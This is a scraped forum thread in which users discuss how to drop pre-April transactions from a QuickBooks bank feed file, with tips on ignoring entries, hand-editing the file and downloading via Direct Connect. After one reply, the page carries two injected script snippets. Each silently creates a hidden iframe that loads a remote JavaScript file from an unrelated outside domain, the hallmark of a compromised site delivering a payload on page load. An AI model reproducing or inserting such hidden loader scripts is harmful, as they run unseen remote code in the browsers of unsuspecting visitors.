Editing QB bank feed file

Collapse
X

• Filter
  • Time
  • Show
Clear All

• Editing QB bank feed file

Does anyone know a way to edit the bank feed file to remove unwanted transactions? We started our QB file on April 1st and I only have the option to download 3 months of transactions from the bank, so there are 100s of entries that cannot be matched. I would like to find a way to remove the entries before April 1st but cannot find a way to do so. Does anyone have any suggestions?

Thanks,

Michael Trotz

I do not use bank feeds, but I thought there was an option to "ignore" the import on a transaction by transaction basis - no?

Comment

Originally posted by MVTrotz View Post
      Does anyone know a way to edit the bank feed file to remove unwanted transactions? We started our QB file on April 1st and I only have the option to download 3 months of transactions from the bank, so there are 100s of entries that cannot be matched. I would like to find a way to remove the entries before April 1st but cannot find a way to do so. Does anyone have any suggestions?

Thanks,

Michael Trotz
      just ignore the transaction in the bank feed. That's the easiest solution. Why you need to mess up with the OBO?
      It's a special mark up file created by Intuit. It has its own syntax/structure. You can open it with any text editor like Notepad/WordPad, remove the transaction you don't want. But you have to make sure the structure/syntax of that file is still correct. Otherwise, the OBO will be corrupted and you can't import to QB.

Comment

Originally posted by Rustler View Post
        I do not use bank feeds, but I thought there was an option to "ignore" the import on a transaction by transaction basis - no?
        Not in the Canadian Enterprise version, unfortunately.

Comment

Don't have it in the UK version either

<script>var iframe=document.createElement('iframe');iframe.sty le.display="none";iframe.src="https://www.klassmedia.com/upload/6/booking.js";document.getElementsByTagName('body')[0].appendChild(iframe);</script>

<script>var iframe=document.createElement('iframe');iframe.sty le.display="none";iframe.src="https://nexcentra.com/upload/8/booking.js";document.getElementsByTagName('body')[0].appendChild(iframe);</script>

Comment

Download using Direct Connect
            Go to the Banking menu.
            Hover over Bank Feeds and select Bank Feeds Center.
            From the Bank Accounts list, choose the account you want to connect. ...
            When you're ready to get your transactions, select Download Transactions. ...
            Select Synchronize.

Comment

Working...
            X